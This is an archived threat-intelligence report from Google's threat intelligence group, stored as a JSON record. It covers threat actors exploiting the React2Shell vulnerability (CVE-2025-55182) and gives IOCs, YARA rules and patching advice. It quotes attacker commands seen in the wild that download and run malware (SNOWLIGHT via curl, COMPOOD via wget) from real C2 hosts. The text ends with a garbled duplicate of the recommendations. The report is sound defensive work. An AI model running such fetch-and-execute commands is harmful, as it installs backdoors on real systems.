{ "id": "2f2810ca-40d6-4658-b55a-479cba8f2c33", "created_at": "2026-04-06T00:21:02.164583Z", "updated_at": "2026-04-10T13:11:48.823198Z", "deleted_at": null, "sha1_hash": "8831939056d868d10d86da0d8dd9b37ee7518052", "title": "Multiple Threat Actors Exploit React2Shell (CVE-2025-55182)", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 86656, "plain_text": "Multiple Threat Actors Exploit React2Shell (CVE-2025-55182)\r\nBy Google Threat Intelligence Group\r\nPublished: 2025-12-12 · Archived: 2026-04-05 13:04:35 UTC\r\nWritten by: Aragorn Tseng, Robert Weiner, Casey Charrier, Zander Work, Genevieve Stark, Austin Larsen\r\nIntroduction\r\nOn Dec. 3, 2025, a critical unauthenticated remote code execution (RCE) vulnerability in React Server Components,\r\ntracked as CVE-2025-55182 (aka \"React2Shell\"), was publicly disclosed. Shortly after disclosure, Google Threat\r\nIntelligence Group (GTIG) had begun observing widespread exploitation across many threat clusters, ranging from\r\nopportunistic cyber crime actors to suspected espionage groups.\r\nGTIG has identified distinct campaigns leveraging this vulnerability to deploy a MINOCAT tunneler, SNOWLIGHT\r\ndownloader, HISONIC backdoor, and COMPOOD backdoor, as well as XMRIG cryptocurrency miners, some of\r\nwhich overlaps with activity previously reported by Huntress. These observed campaigns highlight the risk posed to\r\norganizations using unpatched versions of React and Next.js. This post details the observed exploitation chains and\r\npost-compromise behaviors and provides intelligence to assist defenders in identifying and remediating this threat.\r\nFor information on how Google is protecting customers and mitigation guidance, please refer to our companion blog\r\npost, Responding to CVE-2025-55182: Secure your React and Next.js workloads.\r\nCVE-2025-55182 Overview\r\nCVE-2025-55182 is an unauthenticated RCE vulnerability in React Server Components with a CVSS v3.x score of\r\n10.0 and a CVSS v4 score of 9.3. The flaw allows unauthenticated attackers to send a single HTTP request that\r\nexecutes arbitrary code with the privileges of the user running the affected web server process.\r\nGTIG considers CVE-2025-55182 to be a critical-risk vulnerability. Due to the use of React Server Components\r\n(RSC) in popular frameworks like Next.js, there are a significant number of exposed systems vulnerable to this\r\nissue. Exploitation potential is further increased by two factors: 1) there are a variety of valid payload formats and\r\ntechniques, and 2) the mere presence of vulnerable packages on systems is often enough to permit exploitation.\r\nThe specific RSC packages that are vulnerable to CVE-2025-55182 are versions 19.0, 19.1.0, 19.1.1, and 19.2.0 of:\r\nreact-server-dom-webpack\r\nreact-server-dom-parcel\r\nreact-server-dom-turbopack\r\nA large number of non-functional exploits, and consequently false information regarding viable payloads and\r\nexploitation logic, were widely distributed about this vulnerability during the initial days after disclosure. An\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/threat-actors-exploit-react2shell-cve-2025-55182\r\nPage 1 of 7\n\nexample of a repository that started out wholly non-functional is this repository published by the GitHub user\r\n\" ejpir \", which, while initially claiming to be a legitimate functional exploit, has now updated their README to\r\nappropriately label their initial research claims as AI-generated and non-functional. While this repository still\r\ncontains non-functional exploit code, it also now contains legitimate exploit code with Unicode obfuscation. While\r\ninstances like this initially caused confusion across the industry, the number of legitimate exploits and their\r\ncapabilities have massively expanded, including in-memory Next.js web shell deployment capabilities. There are\r\nalso exploit samples, some entirely fake, some non-functional, and some with legitimate functionality, containing\r\nmalware targeting security researchers. Researchers should validate all exploit code before trusting its capabilities or\r\nlegitimacy.\r\nTechnical write-ups about this vulnerability have been published by reputable security firms, such as the one from\r\nWiz. Researchers should refer to such trusted publications for up-to-date and accurate information when validating\r\nvulnerability details, exploit code, or published detections.\r\nAdditionally, there was a separate CVE issued for Next.js (CVE-2025-66478); however, this CVE has since been\r\nmarked as a duplicate of CVE-2025-55182.\r\nObserved Exploitation Activity\r\nSince exploitation of CVE-2025-55182 began, GTIG has observed diverse payloads and post-exploitation behaviors\r\nacross multiple regions and industries. In this blog post we focus on China-nexus espionage and financially\r\nmotivated activity, but we have additionally observed Iran-nexus actors exploiting CVE-2025-55182.\r\nChina-Nexus Activity\r\nAs of Dec. 12, GTIG has identified multiple China-nexus threat clusters utilizing CVE-2025-55182 to compromise\r\nvictim networks globally. Amazon Web Services (AWS) reporting indicates that China-nexus threat groups Earth\r\nLamia and Jackpot Panda are also exploiting this vulnerability. GTIG tracks Earth Lamia as UNC5454. Currently,\r\nthere are no public indicators available to assess a group relationship for Jackpot Panda.\r\nMINOCAT\r\nGTIG observed China-nexus espionage cluster UNC6600 exploiting the vulnerability to deliver the MINOCAT\r\ntunneler. The threat actor retrieved and executed a bash script used to create a hidden directory ( $HOME/.systemd-utils ), kill any processes named \" ntpclient \", download a MINOCAT binary, and establish persistence by\r\ncreating a new cron job and a systemd service and by inserting malicious commands into the current user's shell\r\nconfig to execute MINOCAT whenever a new shell is started. MINOCAT is an 64-bit ELF executable for Linux that\r\nincludes a custom \"NSS\" wrapper and an embedded, open-source Fast Reverse Proxy (FRP) client that handles the\r\nactual tunneling.\r\nSNOWLIGHT\r\nIn separate incidents, suspected China-nexus threat actor UNC6586 exploited the vulnerability to execute a\r\ncommand using cURL or wget to retrieve a script that then downloaded and executed a SNOWLIGHT\r\ndownloader payload (7f05bad031d22c2bb4352bf0b6b9ee2ca064a4c0e11a317e6fedc694de37737a). SNOWLIGHT\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/threat-actors-exploit-react2shell-cve-2025-55182\r\nPage 2 of 7\n\nis a component of VSHELL, a publicly available multi-platform backdoor written in Go, which has been used by\r\nthreat actors of varying motivations. GTIG observed SNOWLIGHT making HTTP GET requests to C2\r\ninfrastructure (e.g., reactcdn.windowserrorapis[.]com ) to retrieve additional payloads masquerading as legitimate\r\nfiles.\r\ncurl -fsSL -m180 reactcdn.windowserrorapis[.]com:443/?h=reactcdn.windowserrorapis[.]com\u0026p=443\u0026t=tcp\u0026a=l64\u0026stage=t\r\nFigure 1: cURL command executed to fetch SNOWLIGHT payload\r\nCOMPOOD\r\nGTIG also observed multiple incidents in which threat actor UNC6588 exploited CVE-2025-55182, then ran a script\r\nthat used wget to download a COMPOOD backdoor payload. The script then executed the COMPOOD sample,\r\nwhich masqueraded as Vim. GTIG did not observe any significant follow-on activity, and this threat actor's\r\nmotivations are currently unknown.\r\nwget http://45.76.155[.]14/vim -O /tmp/vim\r\n/tmp/vim \"/usr/lib/polkit-1/polkitd --no-debug\"\r\nFigure 2: COMPOOD downloaded via wget and executed\r\nCOMPOOD has historically been linked to suspected China-nexus espionage activity. In 2022, GTIG observed\r\nCOMPOOD in incidents involving a suspected China-nexus espionage actor, and we also observed samples\r\nuploaded to VirusTotal from Taiwan, Vietnam, and China.\r\nHISONIC\r\nAnother China-nexus actor, UNC6603, deployed an updated version of the HISONIC backdoor. HISONIC is a Go-based implant that utilizes legitimate cloud services, such as Cloudflare Pages and GitLab, to retrieve its encrypted\r\nconfiguration. This technique allows the actor to blend malicious traffic with legitimate network activity. In this\r\ninstance, the actor embedded an XOR-encoded configuration for the HISONIC backdoor delimited between two\r\nmarkers, \" 115e1fc47977812 \" to denote the start of the configuration and \" 725166234cf88gxx \" to mark the end.\r\nTelemetry indicates this actor is targeting cloud infrastructure, specifically AWS and Alibaba Cloud instances, within\r\nthe Asia Pacific (APAC) region.\r\n\u003cversion\u003e115e1fc47977812.....REDACTED.....725166234cf88gxx\u003c/version\u003e\r\nFigure 3: HISONIC markers denoting configuration\r\nANGRYREBEL.LINUX\r\nFinally, we also observed a China-nexus actor, UNC6595, exploiting the vulnerability to deploy\r\nANGRYREBEL.LINUX. The threat actor uses an installation script (b.sh) that attempts to evade detection by\r\nmasquerading the malware as the legitimate OpenSSH daemon ( sshd ) within the /etc/ directory, rather than its\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/threat-actors-exploit-react2shell-cve-2025-55182\r\nPage 3 of 7\n\nstandard location. The actor also employs timestomping to alter file timestamps and executes anti-forensics\r\ncommands, such as clearing the shell history ( history -c ). Telemetry indicates this cluster is primarily targeting\r\ninfrastructure hosted on international Virtual Private Servers (VPS).\r\nFinancially Motivated Activity\r\nThreat actors that monetize access via cryptomining are often among the first to exploit newly disclosed\r\nvulnerabilities. GTIG observed multiple incidents, starting on Dec. 5, in which threat actors exploited CVE-2025-\r\n55182 and deployed XMRig for illicit cryptocurrency mining. In one observed chain, the actor downloaded a shell\r\nscript named \"sex.sh,\" which downloads and executes the XMRIG cryptocurrency miner from GitHub. The script\r\nalso attempts to establish persistence for the miner via a new systemd service called \"system-update-service.\"\r\nGTIG has also observed numerous discussions regarding CVE-2025-55182 in underground forums, including\r\nthreads in which threat actors have shared links to scanning tools, proof-of-concept (PoC) code, and their\r\nexperiences using these tools.\r\nOutlook and Implications\r\nAfter the disclosure of high-visibility, critical vulnerabilities, it is common for affected products to undergo a period\r\nof increased scrutiny, resulting in a swift but temporary increase in the number of vulnerabilities discovered. Since\r\nthe disclosure of CVE-2025-55182, three additional React vulnerabilities have been disclosed: CVE-2025-55183,\r\nCVE-2025-55184, and CVE-2025-67779. In this case, two of these follow-on vulnerabilities have relatively limited\r\nimpacts (restricted information disclosure and causing a denial-of-service (DoS) condition). The third vulnerability\r\n(CVE-2025-67779) also causes a DoS condition, as it arose due to an incomplete patch for CVE-2025-55184.\r\nRecommendations\r\nOrganizations utilizing React or Next.js should take the following actions immediately:\r\n1. Patch Immediately:\r\n1. To prevent remote code execution due to CVE-2025-55182, patch vulnerable React Server\r\nComponents to at least 19.0.1, 19.1.2, or 19.2.1, depending on your vulnerable version. Patching to\r\n19.2.2 or 19.2.3 will also prevent the potential for remote code execution.\r\n2. To prevent the information disclosure impacts due to CVE-2025-55183, patch vulnerable React Server\r\nComponents to at least 19.2.2.\r\n3. To prevent DoS impacts due to CVE-2025-55184 and CVE-2025-67779, patch vulnerable React\r\nServer Components to 19.2.3. The 19.2.2 patch was found to be insufficient in preventing DoS\r\nimpacts.\r\n2. Deploy WAF Rules: Google has rolled out a Cloud Armor web application firewall (WAF) rule designed to\r\ndetect and block exploitation attempts related to this vulnerability. We recommend deploying this rule as a\r\ntemporary mitigation while your vulnerability management program patches and verifies all vulnerable\r\ninstances.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/threat-actors-exploit-react2shell-cve-2025-55182\r\nPage 4 of 7\n\n3. Audit Dependencies: Determine if vulnerable React Server Components are included as a dependency in\r\nother applications within your environment.\r\n4. Monitor Network Traffic: Review logs for outbound connections to the indicators of compromise (IOCs)\r\nlisted below, particularly wget or cURL commands initiated by web server processes.\r\n5. Hunt for Compromise: Look for the creation of hidden directories like $HOME/.systemd-utils, the\r\nunauthorized termination of processes such as ntpclient, and the injection of malicious execution logic into\r\nshell configuration files like $HOME/.bashrc.\r\nIndicators of Compromise (IOCs)\r\nTo assist defenders in hunting for this activity, we have included IOCs for the threats described in this blog post. A\r\nbroader subset of related indicators is available in a Google Threat Intelligence Collection of IOCs available for\r\nregistered users.\r\nIndicator Type Description\r\nreactcdn.windowserrorapis[.]com Domain\r\nSNOWLIGHT C2 and\r\nStaging Server\r\n82.163.22[.]139\r\nIP\r\nAddress\r\nSNOWLIGHT C2\r\nServer\r\n216.158.232[.]43\r\nIP\r\nAddress\r\nStaging server for sex.sh\r\nscript\r\n45.76.155[.]14\r\nIP\r\nAddress\r\nCOMPOOD C2 and\r\nPayload Staging Server\r\ndf3f20a961d29eed46636783b71589c183675510737c984a11f78932b177b540 SHA256 HISONIC sample\r\n92064e210b23cf5b94585d3722bf53373d54fb4114dca25c34e010d0c010edf3 SHA256 HISONIC sample\r\n0bc65a55a84d1b2e2a320d2b011186a14f9074d6d28ff9120cb24fcc03c3f696 SHA256\r\nANGRYREBEL.LINUX\r\nsample\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/threat-actors-exploit-react2shell-cve-2025-55182\r\nPage 5 of 7\n\n13675cca4674a8f9a8fabe4f9df4ae0ae9ef11986dd1dcc6a896912c7d527274 SHA256\r\nXMRIG Downloader\r\nScript \r\n(filename: sex.sh)\r\n7f05bad031d22c2bb4352bf0b6b9ee2ca064a4c0e11a317e6fedc694de37737a SHA256\r\nSNOWLIGHT sample\r\n(filename: linux_amd64)\r\n776850a1e6d6915e9bf35aa83554616129acd94e3a3f6673bd6ddaec530f4273 SHA256 MINOCAT sample\r\nYARA Rules\r\nMINOCAT\r\nrule G_APT_Tunneler_MINOCAT_1 {\r\nmeta:\r\nauthor = \"Google Threat Intelligence Group (GTIG)\"\r\ndate_modified = \"2025-12-10\"\r\nrev = \"1\"\r\nmd5 = \"533585eb6a8a4aad2ad09bbf272eb45b\"\r\nstrings:\r\n$magic = { 7F 45 4C 46 }\r\n$decrypt_func = { 48 85 F6 0F 94 C1 48 85 D2 0F 94 C0 08 C1 0F 85 }\r\n$xor_func = { 4D 85 C0 53 49 89 D2 74 57 41 8B 18 48 85 FF 74 }\r\n$frp_str1 = \"libxf-2.9.644/main.c\"\r\n$frp_str2 = \"xfrp login response: run_id: [%s], version: [%s]\"\r\n$frp_str3 = \"cannot found run ID, it should inited when login!\"\r\n$frp_str4 = \"new work connection request run_id marshal failed!\"\r\n$telnet_str1 = \"Starting telnetd on port %d\\n\"\r\n$telnet_str2 = \"No login shell found at %s\\n\"\r\n$key = \"bigeelaminoacow\"\r\ncondition:\r\n$magic at 0 and (1 of ($decrypt_func, $xor_func)) and (2 of ($frp_str*)) and (1 of ($telnet_str*\r\n}\r\nCOMPOOD\r\nrule G_Backdoor_COMPOOD_1 {\r\nmeta:\r\nauthor = \"Google Threat Intelligence Group (GTIG)\"\r\ndate_modified = \"2025-12-11\"\r\nrev = “1”\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/threat-actors-exploit-react2shell-cve-2025-55182\r\nPage 6 of 7\n\nmd5 = “d3e7b234cf76286c425d987818da3304”\r\nstrings:\r\n$strings_1 = \"ShellLinux.Shell\"\r\n$strings_2 = \"ShellLinux.Exec_shell\"\r\n$strings_3 = \"ProcessLinux.sendBody\"\r\n$strings_4 = \"ProcessLinux.ProcessTask\"\r\n$strings_5 = \"socket5Quick.StopProxy\"\r\n$strings_6 = \"httpAndTcp\"\r\n$strings_7 = \"clean.readFile\"\r\n$strings_8 = \"/sys/kernel/mm/transparent_hugepage/hpage_pmd_size\"\r\n$strings_9 = \"/proc/self/auxv\"\r\n$strings_10 = \"/dev/urandom\"\r\n$strings_11 = \"client finished\"\r\n$strings_12 = \"github.com/creack/pty.Start\"\r\ncondition:\r\nuint32(0) == 0x464C457f and 8 of ($strings_*)\r\n}\r\nSNOWLIGHT\r\nrule G_Hunting_Downloader_SNOWLIGHT_1 {\r\nmeta:\r\nauthor = \"Google Threat Intelligence Group (GTIG)\"\r\ndate_created = \"2025-03-25\"\r\ndate_modified = \"2025-03-25\"\r\nmd5 = \"3a7b89429f768fdd799ca40052205dd4\"\r\nrev = 1\r\nstrings:\r\n$str1 = \"rm -rf $v\"\r\n$str2 = \"\u0026t=tcp\u0026a=\"\r\n$str3 = \"\u0026stage=true\"\r\n$str4 = \"export PATH=$PATH:$(pwd)\"\r\n$str5 = \"curl\"\r\n$str6 = \"wget\"\r\n$str7 = \"python -c 'import urllib\"\r\ncondition:\r\nall of them and filesize \u003c 5KB\r\n}\r\nPosted in\r\nThreat Intelligence\r\nSource: https://cloud.google.com/blog/topics/threat-intelligence/threat-actors-exploit-react2shell-cve-2025-55182\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/threat-actors-exploit-react2shell-cve-2025-55182\r\nPage 7 of 7\n\n2. To prevent the Components to information disclosure at least 19.2.2. impacts due to CVE-2025-55183, patch vulnerable React Server\n3. To prevent DoS impacts due to CVe-2025-55184 and CVe-2025-67779, patch vulnerable React\n Server Components to 19.2.3. The 19.2.2 patch was found to be insufficient in preventing DoS\n impacts. \n2. Deploy WAF Rules: Google has rolled out a Cloud Armor web application firewall (WAF) rule designed to\ndetect and block exploitation attempts related to this vulnerability. We recommend deploying this rule as a\ntemporary mitigation while your vulnerability management program patches and verifies all vulnerable \ninstances. \n Page 4 of 7", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "Malpedia" ], "origins": [ "web" ], "references": [ "https://cloud.google.com/blog/topics/threat-intelligence/threat-actors-exploit-react2shell-cve-2025-55182" ], "report_names": [ "threat-actors-exploit-react2shell-cve-2025-55182" ], "threat_actors": [ { "id": "2137e858-a11d-4b75-ae54-3267b096a4fc", "created_at": "2025-06-29T02:01:56.98797Z", "updated_at": "2026-04-10T02:00:04.667535Z", "deleted_at": null, "main_name": "Earth Lamia", "aliases": [], "source_name": "ETDA:Earth Lamia", "tools": [ "BypassBoss", "PULSEPACK" ], "source_id": "ETDA", "reports": null }, { "id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2", "created_at": "2022-10-25T16:07:24.471018Z", "updated_at": "2026-04-10T02:00:05.002374Z", "deleted_at": null, "main_name": "Cron", "aliases": [], "source_name": "ETDA:Cron", "tools": [ "Catelites", "Catelites Bot", "CronBot", "TinyZBot" ], "source_id": "ETDA", "reports": null }, { "id": "3fff98c9-ad02-401d-9d4b-f78b5b634f31", "created_at": "2023-01-06T13:46:38.376868Z", "updated_at": "2026-04-10T02:00:02.949077Z", "deleted_at": null, "main_name": "Cleaver", "aliases": [ "G0003", "Operation Cleaver", "Op Cleaver", "Tarh Andishan", "Alibaba", "TG-2889", "Cobalt Gypsy" ], "source_name": "MISPGALAXY:Cleaver", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "650a9c54-160c-4a25-8e96-e845f2dd6f82", "created_at": "2026-01-18T02:00:03.063535Z", "updated_at": "2026-04-10T02:00:03.901997Z", "deleted_at": null, "main_name": "Earth Lamia", "aliases": [ "UNC5454" ], "source_name": "MISPGALAXY:Earth Lamia", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434862, "ts_updated_at": 1775826708, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/8831939056d868d10d86da0d8dd9b37ee7518052.pdf", "text": "https://archive.orkl.eu/8831939056d868d10d86da0d8dd9b37ee7518052.txt", "img": "https://archive.orkl.eu/8831939056d868d10d86da0d8dd9b37ee7518052.jpg" } }